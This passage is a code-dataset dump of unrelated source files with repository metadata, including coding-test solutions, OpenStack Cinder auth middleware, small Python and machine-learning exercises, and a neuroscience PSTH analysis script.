return F.avg_pool2d(h, kernel_size=h.shape[-2:]).view(h.shape[0], -1)
| [
"[email protected]"
]
| |
e34145873aede1b65f5e55265e1505cc6bde3391 | 387cf5f72ed6679a4d9e04bddd16998a190c4caf | /problems/programmers/lv3/pgs-67258-sweep-slow.py | 6a3ef6ae150570c9680bfdc5e53635a2e6635517 | []
| no_license | CodyBuilder-dev/Algorithm-Coding-Test | db4ee1e7565fbcef3140192225167eff42ad5c02 | cca5c4ba8bc31679ab00aceccfd8d9d39c232f72 | refs/heads/master | 2021-07-24T00:34:41.888289 | 2021-07-21T14:29:00 | 2021-07-21T14:29:00 | 219,123,221 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,347 | py | """
제목 :보석 쇼핑
아이디어 :
"""
def solution(gems):
s = set(gems)
hash = {}
#interval_list = [] # 리스트에 넣고 저장
best_answer = [123456,456789]
for i,gem in enumerate(gems):
if gem not in hash:
hash[gem] = 0
hash[gem] = i
if len(hash) ==len(s):
temp_answer = [min(hash.values()) + 1, max(hash.values()) + 1]
if temp_answer[1] - temp_answer[0] < best_answer[1] - best_answer[0]:
best_answer = temp_answer
elif temp_answer[1] - temp_answer[0] == best_answer[1] - best_answer[0] \
and temp_answer[0] < best_answer[0]:
best_answer = temp_answer
return best_answer
print(solution(["DIA", "RUBY", "RUBY", "DIA", "DIA", "EMERALD", "SAPPHIRE", "DIA"]))
print(solution(["AA", "AB", "AC", "AA", "AC"]))
print(solution(["XYZ", "XYZ", "XYZ"]))
print(solution(["ZZZ", "YYY", "NNNN", "YYY", "BBB"]))
print(solution(["DIA", "EM", "EM", "RUB", "DIA"]))
print(solution(["A", "A", "B"])) #5 #10
print(solution(["AD","AA", "AB", "AC", "AA", "AC", "AD", "AB"]))
print(solution(["AD","AA", "AB", "AC", "AA", "AC", "AD", "AB", "AZ","AB","AC","AA"]))
print(solution(["AD","AA", "AB", "AC", "AA", "AC", "AC", "AD", "AB","AZ","AB","AD","AC","AA","AB","AZ","AA"]))
| [
"[email protected]"
]
| |
c64f6276a76c1f9c5a452595cbcd25de501fd7f6 | e65a448da4f82d6e7c95cfadc5e8dfd06ed05c62 | /cinder/cinder/api/middleware/auth.py | cf898c9b07d780e57e877272a930772dd33360d5 | [
"Apache-2.0"
]
| permissive | bopopescu/devstack | 7a9d11bcc37884f3686e7178ebc25c178a6da283 | 6b73b164af7e5895501f1ca5dafebbba90510846 | refs/heads/master | 2022-11-19T19:58:43.536574 | 2015-01-29T09:00:59 | 2015-01-29T09:00:59 | 282,101,378 | 0 | 0 | null | 2020-07-24T02:17:48 | 2020-07-24T02:17:47 | null | UTF-8 | Python | false | false | 6,014 | py | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Auth Middleware.
"""
import os
from oslo.config import cfg
from oslo.serialization import jsonutils
import webob.dec
import webob.exc
from cinder.api.openstack import wsgi
from cinder import context
from cinder.i18n import _
from cinder.openstack.common import log as logging
from cinder.openstack.common.middleware import request_id
from cinder import wsgi as base_wsgi
use_forwarded_for_opt = cfg.BoolOpt(
'use_forwarded_for',
default=False,
help='Treat X-Forwarded-For as the canonical remote address. '
'Only enable this if you have a sanitizing proxy.')
CONF = cfg.CONF
CONF.register_opt(use_forwarded_for_opt)
LOG = logging.getLogger(__name__)
def pipeline_factory(loader, global_conf, **local_conf):
"""A paste pipeline replica that keys off of auth_strategy."""
pipeline = local_conf[CONF.auth_strategy]
if not CONF.api_rate_limit:
limit_name = CONF.auth_strategy + '_nolimit'
pipeline = local_conf.get(limit_name, pipeline)
pipeline = pipeline.split()
filters = [loader.get_filter(n) for n in pipeline[:-1]]
app = loader.get_app(pipeline[-1])
filters.reverse()
for filter in filters:
app = filter(app)
return app
class InjectContext(base_wsgi.Middleware):
"""Add a 'cinder.context' to WSGI environ."""
def __init__(self, context, *args, **kwargs):
self.context = context
super(InjectContext, self).__init__(*args, **kwargs)
@webob.dec.wsgify(RequestClass=base_wsgi.Request)
def __call__(self, req):
req.environ['cinder.context'] = self.context
return self.application
class CinderKeystoneContext(base_wsgi.Middleware):
"""Make a request context from keystone headers."""
@webob.dec.wsgify(RequestClass=base_wsgi.Request)
def __call__(self, req):
user_id = req.headers.get('X_USER')
user_id = req.headers.get('X_USER_ID', user_id)
if user_id is None:
LOG.debug("Neither X_USER_ID nor X_USER found in request")
return webob.exc.HTTPUnauthorized()
# get the roles
roles = [r.strip() for r in req.headers.get('X_ROLE', '').split(',')]
if 'X_TENANT_ID' in req.headers:
# This is the new header since Keystone went to ID/Name
project_id = req.headers['X_TENANT_ID']
else:
# This is for legacy compatibility
project_id = req.headers['X_TENANT']
project_name = req.headers.get('X_TENANT_NAME')
req_id = req.environ.get(request_id.ENV_REQUEST_ID)
# Get the auth token
auth_token = req.headers.get('X_AUTH_TOKEN',
req.headers.get('X_STORAGE_TOKEN'))
# Build a context, including the auth_token...
remote_address = req.remote_addr
service_catalog = None
if req.headers.get('X_SERVICE_CATALOG') is not None:
try:
catalog_header = req.headers.get('X_SERVICE_CATALOG')
service_catalog = jsonutils.loads(catalog_header)
except ValueError:
raise webob.exc.HTTPInternalServerError(
explanation=_('Invalid service catalog json.'))
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctx = context.RequestContext(user_id,
project_id,
project_name=project_name,
roles=roles,
auth_token=auth_token,
remote_address=remote_address,
service_catalog=service_catalog,
request_id=req_id)
req.environ['cinder.context'] = ctx
return self.application
class NoAuthMiddleware(base_wsgi.Middleware):
"""Return a fake token if one isn't specified."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
if 'X-Auth-Token' not in req.headers:
user_id = req.headers.get('X-Auth-User', 'admin')
project_id = req.headers.get('X-Auth-Project-Id', 'admin')
os_url = os.path.join(req.url, project_id)
res = webob.Response()
# NOTE(vish): This is expecting and returning Auth(1.1), whereas
# keystone uses 2.0 auth. We should probably allow
# 2.0 auth here as well.
res.headers['X-Auth-Token'] = '%s:%s' % (user_id, project_id)
res.headers['X-Server-Management-Url'] = os_url
res.content_type = 'text/plain'
res.status = '204'
return res
token = req.headers['X-Auth-Token']
user_id, _sep, project_id = token.partition(':')
project_id = project_id or user_id
remote_address = getattr(req, 'remote_address', '127.0.0.1')
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctx = context.RequestContext(user_id,
project_id,
is_admin=True,
remote_address=remote_address)
req.environ['cinder.context'] = ctx
return self.application
| [
"[email protected]"
]
| |
f6e400373186312a9fcf3e60bc466491e7ced87f | 780b6cca690a213ac908b1cd5faef5366a18dc4e | /276_newbie_bite/save1_passed.py | 7568b69b77be52f1d12ae46c2c3d5cec4cd7fba1 | []
| no_license | katkaypettitt/pybites-all | 899180a588e460b343c00529c6a742527e4ea1bc | 391c07ecac0d92d5dc7c537bcf92eb6c1fdda896 | refs/heads/main | 2023-08-22T16:33:11.171732 | 2021-10-24T17:29:44 | 2021-10-24T17:29:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | # Hint: Don't forget the 4 leading spaces to
# indicate your code is within the function.
a = 10
b = 5
def multiply_numbers(a, b):
return a * b
def enter_name():
username = input("What is your name?")
return username | [
"[email protected]"
]
| |
9de698aabcd24e0d8e7b125ea53adbb5167b3d8b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02394/s366374910.py | 34d6b2cc6782e5002623f9419f9f8a358a2dd94e | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | w, h, x, y, r = map(int, input().split())
if 0 <= (x-r) and (x+r) <= w and 0 <= (y-r) and (y+r) <= h:
print("Yes")
else:
print("No")
| [
"[email protected]"
]
| |
e2f80ae63c842ab915e70054164ea7ef16f417b2 | 15fb62305a2fa0146cc84b289642cc01a8407aab | /Python/119-pascalTriangle2.py | ca82b9b5ce299755fd88d42d79285542b566e463 | []
| no_license | geniousisme/leetCode | ec9bc91864cbe7520b085bdab0db67539d3627bd | 6e12d67e4ab2d197d588b65c1ddb1f9c52a7e047 | refs/heads/master | 2016-09-09T23:34:03.522079 | 2015-09-23T16:15:05 | 2015-09-23T16:15:05 | 32,052,408 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from math import factorial
class Solution:
# @param {integer} rowIndex
# @return {integer[]}
def getRow(self, rowIndex):
res = []
f = factorial
n = rowIndex
for k in xrange(rowIndex + 1):
res.append(f(n) / f(k) / f(n - k))
return res
if __name__ == '__main__':
s = Solution()
for i in xrange(10):
print s.getRow(i)
| [
"[email protected]"
]
| |
790f7806b7f537150ccb4a127bd799627afad0e4 | 1f8344813458f669bdf77059220290a3b2a3cdd0 | /tutorials-docs/thinking-in-coroutines/8_run_in_default_executor.py | 81a53d28f3690104d9512aac1b837e073a2f0b81 | []
| no_license | gridl/asyncio-study-group | 7c03e8640070ebe8d1103f27bc3c3da37a5a661f | 1ba9cf90e21b5174518032d467e89526da219576 | refs/heads/master | 2020-07-02T07:03:12.364097 | 2017-12-26T20:55:09 | 2017-12-26T20:55:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | import time
import datetime
import asyncio
def blocking_call(seconds):
print(seconds, datetime.datetime.now())
time.sleep(seconds)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.call_later(5, loop.stop)
for i in range(1,4):
#по умолчанию используется concurrent.futures.ThreadPoolExecutor
# для этого надо передать executor = None
#количество потоков по умолчанию:
#number of processors on the machine, multiplied by 5
loop.run_in_executor(None, blocking_call, i)
try:
loop.run_forever()
finally:
loop.close()
| [
"[email protected]"
]
| |
8ba3ca416a5d385c1158274f46e71ad3750148eb | e7af30370e277b459e1c49edcc0562d5b5c32abc | /Learning_ScikitLearn/Model/Linear_Classification/LogisticRegression_Classification.py | 68bb53cef0d25d1f7959af186211991c7beda251 | []
| no_license | justgolikeme/My_MachineLearning | 208ab766478662cf36ffa7f9202fed0ad6f0ad28 | 948a84684a2a6f1c9e613948ed246062468016bd | refs/heads/master | 2022-05-13T05:02:48.488269 | 2020-01-03T07:27:50 | 2020-01-03T07:27:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | # -*- coding: utf-8 -*-
# @Time : 2019/12/16 15:55
# @Author : Mr.Lin
'''
用于分类的线性模型
线性模型也广泛应用于分类问题。我们首先来看二分类。这时可以利用下面的公式进行
预测:
ŷ = w[0] * x[0] + w[1] * x[1] + …+ w[p] * x[p] + b > 0
这个公式看起来与线性回归的公式非常相似,但我们没有返回特征的加权求和,而是为预
测设置了阈值(0)。如果函数值小于 0,我们就预测类别 -1;如果函数值大于 0,我们就
预测类别 +1。对于所有用于分类的线性模型,这个预测规则都是通用的。同样,有很多种
不同的方法来找出系数(w)和截距(b)。
对于用于回归的线性模型,输出 ŷ 是特征的线性函数,是直线、平面或超平面(对于更高
维的数据集)。对于用于分类的线性模型,决策边界是输入的线性函数。换句话说,(二
元)线性分类器是利用直线、平面或超平面来分开两个类别的分类器。本节我们将看到这
方面的例子。
学习线性模型有很多种算法。这些算法的区别在于以下两点:
• 系数和截距的特定组合对训练数据拟合好坏的度量方法;
• 是否使用正则化,以及使用哪种正则化方法。
不同的算法使用不同的方法来度量“对训练集拟合好坏”。由于数学上的技术原因,不可
能调节 w 和 b 使得算法产生的误分类数量最少。对于我们的目的,以及对于许多应用而
言,上面第一点(称为损失函数)的选择并不重要。
最常见的两种线性分类算法是 Logistic 回归(logistic regression)和线性支持向量机(linear
support vector machine,线性 SVM),前者在 linear_model.LogisticRegression 中实现,
后者在 svm.LinearSVC (SVC 代表支持向量分类器)中实现。虽然 LogisticRegression
的名字中含有回归(regression),但它是一种分类算法,并不是回归算法,不应与
LinearRegression 混淆。
'''
from sklearn.cross_validation import cross_val_predict, cross_val_score
from sklearn.linear_model import LogisticRegression
from Learning_ScikitLearn.Model.Linear_Classification.Data_Source import X_test,X_train,y_train,y_test,data_y,data_X
# logreg = LogisticRegression().fit(X_train, y_train)
# print("Training set score: {:.3f}".format(logreg.score(X_train, y_train)))
# print("Test set score: {:.3f}".format(logreg.score(X_test, y_test)))
# Training set score: 0.955
# Test set score: 0.958
#
# [0.94827586 0.9137931 0.92982456 0.94736842 0.96491228 0.98245614
# 0.94736842 0.94642857 0.96428571 0.96428571]
# print("")
# print(cross_val_score(logreg, data_X, data_y, cv=10))
def test_C_Parameter():
C = [0.1,1,10]
for c in C:
logreg = LogisticRegression(C=c)
logreg.fit(X_train,y_train)
print("C为:{}下的分数:{}\n".format(c,cross_val_score(logreg, data_X, data_y, cv=10)))
test_C_Parameter()
| [
"[email protected]"
]
| |
7ad47d35b8b6d618120876ea81cee10cd4498f0f | 329b48089c64ebefe78d52f1c71c73bdadadd4b4 | /ML/m02_3_xor.py | f054586220c6b7e9e2f5ec6da088dfde56b25a5d | []
| no_license | variablejun/keras__R | 7f854570952ed97c48715047015786d873e512cb | 9faf4814b46cda1ac0ddbf2a2f8236fa0394f144 | refs/heads/main | 2023-07-13T19:32:25.950500 | 2021-08-22T18:26:52 | 2021-08-22T18:26:52 | 398,870,548 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from sklearn.svm import LinearSVC
import numpy as np
from sklearn.metrics import accuracy_score
#1 data
x_data = [[0,0],[0,1],[1,0],[1,1]]
y_data = [0,1,1,0]
#2 model
model = LinearSVC()
#3 fit
model.fit(x_data,y_data)
#4 평가
y_predict = model.predict(x_data)
print(x_data,' 의 예측값 : ',y_predict)
results= model.score(x_data, y_data)
print('score : ',results)
acc = accuracy_score(y_data,y_predict)
print('acc : ',acc)
'''
[[0, 0], [0, 1], [1, 0], [1, 1]] 의 예측값 : [0 0 0 0]
score : 0.5
acc : 0.5
[[0, 0], [0, 1], [1, 0], [1, 1]] 의 예측값 : [1 1 1 1]
score : 0.5
acc : 0.5
''' | [
"[email protected]"
]
| |
9d79f133ae46df0a2a814949bc56bb9b67709332 | 92754bb891a128687f3fbc48a312aded752b6bcd | /Algorithms/Python3.x/836-Rectangle_Overlap.py | 109710852b3db1879f46f641e56714e64efbeca6 | []
| no_license | daidai21/Leetcode | ddecaf0ffbc66604a464c3c9751f35f3abe5e7e5 | eb726b3411ed11e2bd00fee02dc41b77f35f2632 | refs/heads/master | 2023-03-24T21:13:31.128127 | 2023-03-08T16:11:43 | 2023-03-08T16:11:43 | 167,968,602 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | # Runtime: 32 ms, faster than 89.53% of Python3 online submissions for Rectangle Overlap.
# Memory Usage: 13.9 MB, less than 8.33% of Python3 online submissions for Rectangle Overlap.
class Solution:
def isRectangleOverlap(self, rec1: List[int], rec2: List[int]) -> bool:
return rec1[0] < rec2[2] and rec2[0] < rec1[2] and rec1[1] < rec2[3] and rec2[1] < rec1[3]
"""
(left1, right1), (left2, right2)
Meet the requirements of the topic Equivalent to :
left1 < x < right1 && left2 < x < right2
left1 < x < right2 && left2 < x < right1
left1 < right2 && left2 < right1
"""
| [
"[email protected]"
]
| |
bfb211f64cb26ced576000456975b8ac4e62ba43 | dab869acd10a3dc76e2a924e24b6a4dffe0a875f | /Laban/build/bdist.win32/winexe/temp/numpy.core.operand_flag_tests.py | abe53bfc427cda30a4fdef6d870c6ffe58b6c013 | []
| no_license | ranBernstein/Laban | d82aff9b0483dd007e03a06e51f7d635f62ed05d | 54c88afa9493deacbdd182904cc5d180ecb208b4 | refs/heads/master | 2021-01-23T13:17:51.777880 | 2017-02-14T09:02:54 | 2017-02-14T09:02:54 | 25,508,010 | 3 | 1 | null | 2017-02-14T09:02:55 | 2014-10-21T07:16:01 | Tcl | UTF-8 | Python | false | false | 379 | py |
def __load():
import imp, os, sys
try:
dirname = os.path.dirname(__loader__.archive)
except NameError:
dirname = sys.prefix
path = os.path.join(dirname, 'numpy.core.operand_flag_tests.pyd')
#print "py2exe extension module", __name__, "->", path
mod = imp.load_dynamic(__name__, path)
## mod.frozen = 1
__load()
del __load
| [
"[email protected]"
]
| |
cde96ba8bed0f8a27d9a27fc09c79f90b37b0093 | 4781d9293b59a5072647bb179195b143c60621bd | /백준/3190_뱀/3190_뱀.py | 466985fd6c7408c5d7d548c56da8c4c1f93da5da | []
| no_license | chriskwon96/Algorithm_codes | bf98131f66ca9c091fe63db68b220527800069c9 | edb7b803370e87493dad4a38ee858bb7bb3fd31d | refs/heads/master | 2023-08-15T18:48:26.809864 | 2021-10-12T13:43:21 | 2021-10-12T13:43:21 | 387,803,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,488 | py | di = [0, -1, 0, +1]
dj = [+1, 0, -1, 0]
N = int(input())
matrix = [[0]*N for _ in range(N)]
K = int(input())
for _ in range(K): #사과위치 1로 지정
i, j = map(int, input().split())
matrix[i-1][j-1] = 1
L = int(input())
q = [(0,0)] #뱀 몸
X1, k, cnt = 0, 0, 0
flag = 1
for _ in range(L):
X, C = input().split()
for _ in range(int(X)-X1):
head = q[0]
cnt += 1
n_x, n_y = head[0]+di[k], head[1]+dj[k]
if 0<=n_x<N and 0<=n_y<N and ((n_x, n_y) not in q): #다음칸이 판 안에 있고 내 몸이 아니라면
q.insert(0, (n_x, n_y)) #머리좌표 q에 삽입
if matrix[n_x][n_y]: #사과라면
matrix[n_x][n_y] = 0 #사과 지워주기
else:
q.pop() #사과가 아니면 꼬리 줄여주기
else: # 게임이 끝나면
print(cnt)
flag = 0
break
if not flag:
break
X1 = int(X)
if C == 'L':
k = (k+1)%4
else:
k = (k-1)%4
if flag: #인풋을 다 받아도 끝나지 않았다면
head = q[0]
n_x, n_y = head[0]+di[k], head[1]+dj[k]
while 0<=n_x<N and 0<=n_y<N and ((n_x, n_y) not in q):
cnt += 1
q.insert(0, (n_x, n_y))
if matrix[n_x][n_y]: #사과라면
matrix[n_x][n_y] = 0 #사과 지워주기
else:
q.pop() #사과가 아니면 꼬리 줄여주기
n_x, n_y = n_x + di[k], n_y + dj[k]
print(cnt+1)
| [
"[email protected]"
]
| |
b417569a701914b13050a450dfb4e9d8d98231f5 | 59cdb8b3995ee5938dc4710e32f29ac273410265 | /firing_analyses/unit_response_characterization/gather_psths.py | a170cd2c1a9f45a1da9d668f911611f166dfb215 | []
| no_license | abuzarmahmood/firing_space_plot | 15ff667fada8f4e985a6a6c6f31261b72b0f4b60 | 9fe925d9b443fda96d8e23d6d2d2d2aa60b08f15 | refs/heads/master | 2023-07-25T01:39:31.942434 | 2023-07-15T14:24:38 | 2023-07-15T14:24:38 | 139,602,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,390 | py | """
Go through all specified files and generate PSTHs
for GC and BLA neurons to save in a consolidated location
For each neuron, also calculate discriminability and palatability correlation
"""
########################################
# ___ _
#|_ _|_ __ ___ _ __ ___ _ __| |_
# | || '_ ` _ \| '_ \ / _ \| '__| __|
# | || | | | | | |_) | (_) | | | |_
#|___|_| |_| |_| .__/ \___/|_| \__|
# |_|
########################################
import os
import sys
import pylab as plt
import numpy as np
import argparse
from glob import glob
import json
import pandas as pd
import pingouin as pg
from joblib import Parallel, delayed, cpu_count
from tqdm import tqdm,trange
from scipy.stats import spearmanr, pearsonr
sys.path.append('/media/bigdata/firing_space_plot/ephys_data')
from ephys_data import ephys_data
import visualize
def parallelize(func, iterator):
return Parallel(n_jobs = cpu_count()-2)\
(delayed(func)(this_iter) for this_iter in tqdm(iterator))
############################################################
# _ _ ____ _
#| | ___ __ _ __| | | _ \ __ _| |_ __ _
#| | / _ \ / _` |/ _` | | | | |/ _` | __/ _` |
#| |__| (_) | (_| | (_| | | |_| | (_| | || (_| |
#|_____\___/ \__,_|\__,_| |____/ \__,_|\__\__,_|
############################################################
file_list_path = '/media/bigdata/Abuzar_Data/hdf5_file_list.txt'
plot_save_dir = '/media/bigdata/Abuzar_Data/all_overlay_psths'
if not os.path.exists(plot_save_dir):
os.makedirs(plot_save_dir)
region_name_list = ['gc','bla']
region_plot_dirs = [os.path.join(plot_save_dir,this_name) \
for this_name in region_name_list]
for this_plot_dir in region_plot_dirs:
if not os.path.exists(this_plot_dir):
os.makedirs(this_plot_dir)
def get_plot_dir(region_name):
return [plot_dir for name,plot_dir \
in zip(region_name_list,region_plot_dirs)\
if region_name == name ][0]
counter_list = [0,0]
def add_to_counter(region_name):
ind = [num for num,this_name \
in enumerate(region_name_list)\
if region_name == this_name][0]
current_count = counter_list[ind]
counter_list[ind] +=1
return current_count
#parser = argparse.ArgumentParser(description = 'Script to fit changepoint model')
#parser.add_argument('dir_name', help = 'Directory containing data files')
#parser.add_argument('states', type = int, help = 'Number of States to fit')
#args = parser.parse_args()
#data_dir = args.dir_name
taste_names = ['nacl', 'suc', 'ca', 'qhcl']
pal_map = dict(zip(taste_names, [3,4,2,1]))
with open(file_list_path,'r') as this_file:
file_list = this_file.read().splitlines()
dir_list = [os.path.dirname(x) for x in file_list]
#dir_list = [x for x in dir_list if 'bla_gc'in x]
wanted_sessions = ['AM34_4Tastes_201215', 'AM37_4Tastes_210112']
dir_list = [[x for x in dir_list if y in x] for y in wanted_sessions]
dir_list = [x for y in dir_list for x in y]
#For each file, calculate baks firing, split by region
# and save PSTH in a folder with file name and
# unit details
alpha = 0.05
#black_list = [
# '/media/storage/gc_only/AS18/AS18_4Tastes_200228_151511_copy/AS18_4Tastes_200228_151511'
# ]
#dir_list = [x for x in dir_list if x not in black_list]
#dir_list = [x for x in dir_list if 'AM34' in x]
#for data_dir in dir_list:
for ind in trange(len(dir_list)):
#for ind in trange(53, len(dir_list)):
data_dir = dir_list[ind]
#data_dir = os.path.dirname(file_list[0])
#data_dir = '/media/bigdata/Abuzar_Data/AM28/AM28_2Tastes_201005_134840'
data_basename = os.path.basename(data_dir)
# Look for info file
# If absent, skip this file because we won't know tastant names
info_file_path = glob(os.path.join(data_dir,"*.info"))
if len(info_file_path) == 0:
continue
with open(info_file_path[0], 'r') as params_file:
info_dict = json.load(params_file)
taste_names = info_dict['taste_params']['tastes']
taste_pals = np.array([pal_map[x] for x in taste_names])
dat = ephys_data(data_dir)
# Try to get spikes, if can't, skip file
try:
dat.get_spikes()
except:
continue
if not dat.spikes[0].shape[-1]==7000:
continue
dat.firing_rate_params = dat.default_firing_params
dat.firing_rate_params['type'] = 'conv'
dat.get_unit_descriptors()
dat.get_region_units()
dat.get_firing_rates()
unit_region_map = [{x:region_name for x in this_region} \
for this_region,region_name \
in zip(dat.region_units, dat.region_names)]
fin_unit_map = {}
for x in unit_region_map:
fin_unit_map.update(x)
# For each neuron, calculate disciriminability per bin
inds = np.array(list(np.ndindex(dat.firing_array.shape)))
firing_frame = pd.DataFrame(
dict(
taste = inds[:,0],
neurons = inds[:,1],
trials = inds[:,2],
bins = inds[:,3],
firing = dat.firing_array.flatten()
)
)
group_keys = ['neurons','bins']
grouped_frame = list(firing_frame.groupby(group_keys))
group_tuples = [x[0] for x in grouped_frame]
group_tuple_dicts = [dict(zip(group_keys, x)) for x in group_tuples]
group_dat = [x[1] for x in grouped_frame]
anova_lambda = lambda x : \
pg.anova(data=x, dv = 'firing', between = 'taste')['p-unc'].values[0]
p_vals = parallelize(anova_lambda, group_dat)
# It seems like sometimes the anova conks out
# Replace any strings with int(1)
p_vals = [x if isinstance(x, np.float) else 1 for x in p_vals]
discrim_frame = pd.DataFrame(group_tuple_dicts)
discrim_frame['discrim_p_vals'] = p_vals
discrim_frame['discrim_bool'] = (discrim_frame['discrim_p_vals'] < alpha )*1
# Conservative criterion, significance has to persist for 75ms otherwise toss
# This is from 3 consecutive windows of firing rate with 25ms steps
kern_len = 4
box_kern = np.ones(kern_len)/kern_len
discrim_frame['discrim_bool_cons'] = \
np.convolve(discrim_frame['discrim_bool'], box_kern, mode = 'same') == 1
discrim_frame['discrim_bool_cons'] *= 1
discrim_frame['p_vals_conv'] = \
np.convolve(discrim_frame['discrim_p_vals'], box_kern, mode = 'same')
# Also calculate palatability correlation for sinle neurons
taste_pal_broad = np.expand_dims(taste_pals, (1,2,3))
taste_pal_broad = np.broadcast_to(taste_pal_broad,
dat.firing_array.shape)
firing_array = dat.firing_array.copy()
#firing_array = np.moveaxis(firing_array, 1,2)
#firing_array = np.reshape(firing_array, (-1, *firing_array.shape[2:]))
#taste_pal_broad = np.moveaxis(taste_pal_broad, 1,2)
#taste_pal_broad = np.reshape(taste_pal_broad, (-1, *taste_pal_broad.shape[2:]))
#firing_array = firing_array.T
#taste_pal_broad = taste_pal_broad.T
iter_inds = list(np.ndindex((
firing_array.shape[1],
firing_array.shape[-1])))
corr_lambda = lambda inds: \
pearsonr( firing_array[:,inds[0],:,inds[1]].flatten(),
taste_pal_broad[:,inds[0],:,inds[1]].flatten()
)
corr_outs = parallelize(corr_lambda, iter_inds)
corr_pvals = [x[1] for x in corr_outs]
corr_rhos = [np.abs(x[0]) for x in corr_outs]
iter_array = np.array(iter_inds)
corr_frame = pd.DataFrame(
dict(
neurons = iter_array[:,0],
bins = iter_array[:,1],
corr_pvals = corr_pvals,
corr_rhos = corr_rhos
)
)
corr_frame['pvals_cons'] = \
np.convolve(corr_frame['corr_pvals'], box_kern, mode = 'same')
corr_frame['sig_bool'] = corr_frame['pvals_cons'] <= alpha
#corr_array = corr_frame.pivot(
# index = 'neurons',
# columns = 'bins',
# values = 'corr_pvals').to_numpy()
#fig,ax = plt.subplots()
#ax.imshow(corr_array < alpha,
# interpolation = 'nearest', aspect='auto')
#fig.savefig(
# os.path.join(plot_save_dir, f'{data_basename}_corr.png'),
# dpi = 300)
#plt.close(fig)
############################################################
#fin_pval_frame = discrim_frame.join(corr_frame,
# lsuffix = 'x', rsuffix = 'y')
#fin_pval_frame.drop(columns = ['binsy','neuronsy'], inplace=True)
#fin_pval_frame.rename(columns = dict(neuronsx = 'neurons',
# binsx = 'bins'), inplace=True)
#fin_pval_frame['region'] = [fin_unit_map[x] for x in \
# fin_pval_frame.neurons.values]
#fin_pval_frame.to_json(
# os.path.join(plot_save_dir, f'{data_basename}_unit_pvals.json')
# )
#fin_pval_frame['time'] = (fin_pval_frame.bins * bin_width)-stim_t
############################################################
############################################################
stim_t = 2000
time_lims = [1000,5000]
time_vec = np.arange(dat.spikes[0].shape[-1])-stim_t
time_vec = time_vec[time_lims[0]:time_lims[1]]
if dat.firing_rate_params['type'] == 'baks':
bin_width = int(dat.firing_rate_params['baks_resolution']/\
dat.firing_rate_params['baks_dt'] )
else:
bin_width = int(dat.firing_rate_params['step_size'])
baks_time_vec = time_vec[::bin_width]
#fin_pval_frame = fin_pval_frame[fin_pval_frame.time.isin(baks_time_vec)]
corr_frame['time'] = (corr_frame.bins * bin_width)-stim_t
discrim_frame['time'] = (discrim_frame.bins * bin_width)-stim_t
discrim_frame = discrim_frame[discrim_frame.time.isin(baks_time_vec)]
corr_frame = corr_frame[corr_frame.time.isin(baks_time_vec)]
# Add region name
corr_frame['region'] = [fin_unit_map[x] for x in \
corr_frame.neurons.values]
discrim_frame['region'] = [fin_unit_map[x] for x in \
discrim_frame.neurons.values]
discrim_frame.to_json(
os.path.join(plot_save_dir, f'{data_basename}_discrim_frame.json')
)
corr_frame.to_json(
os.path.join(plot_save_dir, f'{data_basename}_corr_frame.json')
)
mean_firing = np.mean(dat.firing_array,axis=2)
mean_firing = mean_firing[...,time_lims[0]//bin_width:time_lims[1]//bin_width]
for this_region_name, this_unit_list in zip(dat.region_names,dat.region_units):
for unit_num in this_unit_list:
#unit_frame = fin_pval_frame[fin_pval_frame.neurons.isin([unit_num])]
unit_corr_frame = \
corr_frame[corr_frame.neurons.isin([unit_num])]
unit_sig_corr = unit_corr_frame[unit_corr_frame.corr_pvals < alpha]
unit_discrim_frame = \
discrim_frame[discrim_frame.neurons.isin([unit_num])]
unit_discrim_frame['bool'] = \
1*(unit_discrim_frame.discrim_p_vals < alpha)
#fig,ax = plt.subplots(3,1, sharex=True)
fig = plt.figure()
ax = []
ax.append(fig.add_subplot(2,1,1))
ax.append(fig.add_subplot(4,1,3))#, sharex = ax[0]))
ax.append(fig.add_subplot(4,1,4))#, sharex = ax[0]))
xlims = [-500, 1500]
xinds = np.logical_and(baks_time_vec >= xlims[0],
baks_time_vec <= xlims[1])
fin_time_vec = baks_time_vec[xinds]
unit_discrim_frame = unit_discrim_frame[unit_discrim_frame.time.isin(fin_time_vec)]
unit_corr_frame = unit_corr_frame[unit_corr_frame.time.isin(fin_time_vec)]
unit_sig_corr = unit_sig_corr[unit_sig_corr.time.isin(fin_time_vec)]
for taste_num,this_taste in enumerate(mean_firing[:,unit_num]):
ax[0].plot(fin_time_vec,
this_taste[xinds], label = taste_names[taste_num],
linewidth = 2)
#ax[0].legend()
fig.suptitle(os.path.basename(dat.data_dir) + \
f'\nUnit {unit_num}, '\
f'Electrode {dat.unit_descriptors[unit_num][0]}')#, '\
#f'Region : {this_region_name}')
ax[-1].set_xlabel('Time post-stimulus delivery (ms)')
ax[0].set_ylabel('Firing Rate (Hz)')
#ax[0].set_xlim([-500, 1500])
#ax[1].set_xlim([-500, 1500])
